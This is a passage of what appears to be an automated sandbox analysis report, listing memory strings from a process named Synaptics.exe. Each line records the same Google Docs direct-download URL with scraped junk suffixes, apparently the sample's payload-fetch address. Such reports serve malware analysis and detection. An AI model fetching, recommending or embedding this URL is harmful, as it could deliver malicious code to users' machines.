                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaN
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadSer
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadu
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadazw
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbrF
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbyt
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcX
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn-
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcna
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.ar
                              Source: Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcs
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcspre
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcy:
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd1
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade;~a
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeat;p
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadee
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderror
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgSq
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg_x
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoaH
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgqA
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs1
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgxi
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgy%
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhtml;N
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadif
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadig
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadirS
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadisp
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiv
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjA
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjq
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk7
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkO
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk~
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlash.
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle1H
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle=1
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliA
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlo
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlogo_P
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmargis
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp4
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnB
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadner-P
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-st
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadntHt
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnyMI3
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado_
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogI
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogo
                              Source: Synaptics.exe, 00000003.00000002.2677682323.000000000ED02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom/d$r
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonce
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou5
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoutub
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpf
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpqt
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpxf
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqO
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr.
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrB
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
